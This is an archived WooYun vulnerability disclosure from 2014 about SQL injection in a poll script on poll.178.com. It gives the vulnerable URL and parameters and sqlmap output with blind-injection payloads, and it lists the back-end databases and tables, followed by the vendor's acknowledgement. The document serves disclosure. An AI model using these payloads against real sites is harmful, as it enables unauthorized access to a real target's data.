乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-17: 细节已通知厂商并且等待厂商处理中 2014-07-17: 厂商已经确认,细节仅向厂商公开 2014-07-27: 细节向核心白帽子及相关领域专家公开 2014-08-06: 细节向普通白帽子公开 2014-08-16: 细节向实习白帽子公开 2014-08-31: 细节向公众公开
不送礼物啥都白扯!
注入:
http://poll.178.com:80//post_poll.php?pid=2628 (POST)vid=2628&vkey[]=20458&submit=
sqlmap identified the following injection points with a total of 684 HTTP(s) requests:---Place: GETParameter: pid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=2628 AND 4930=4930 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: pid=2628 AND SLEEP(5)---web application technology: Nginx, PHP 5.2.17back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: pid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=2628 AND 4930=4930 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: pid=2628 AND SLEEP(5)---web application technology: Nginx, PHP 5.2.17back-end DBMS: MySQL 5.0.11available databases [4]:[*] information_schema[*] poll[*] poll_new[*] test
Database: poll_new[22 tables]+---------------------------------------+| act_body || act_key || act_userinfo || act_userlog || poll_cache || poll_contentcategory || poll_contributiveness_body || poll_contributiveness_cate || poll_contributiveness_key || poll_contributiveness_log || poll_contributiveness_tag_info || poll_fabu_link || poll_key || poll_record || poll_user_field || poll_usergroup || poll_vadminuser || poll_vbody || poll_vcategory || poll_vkey || poll_vlogs || poll_vmod |+---------------------------------------+Database: poll[30 tables]+---------------------------------------+| act_body || act_key || act_userinfo || act_userlog || annual || poll_body || poll_cache || poll_contentcategory || poll_contributiveness_body || poll_contributiveness_cate || poll_contributiveness_key || poll_contributiveness_log || poll_contributiveness_tag_info || poll_fabu_link || poll_fields || poll_fkey_info || poll_key || poll_key_extra || poll_logs || poll_record || poll_user_field || poll_user_fields || poll_user_log || poll_usergroup || poll_vadminuser || poll_vbody || poll_vcategory || poll_vkey || poll_vlogs || poll_vmod |+---------------------------------------+Database: information_schema[37 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
过滤,其实你们站点注入还不少,认真找找能找到不少呢。
危害等级:高
漏洞Rank:15
确认时间:2014-07-17 11:52
谢谢!遗留项目太多,见笑了。
暂无
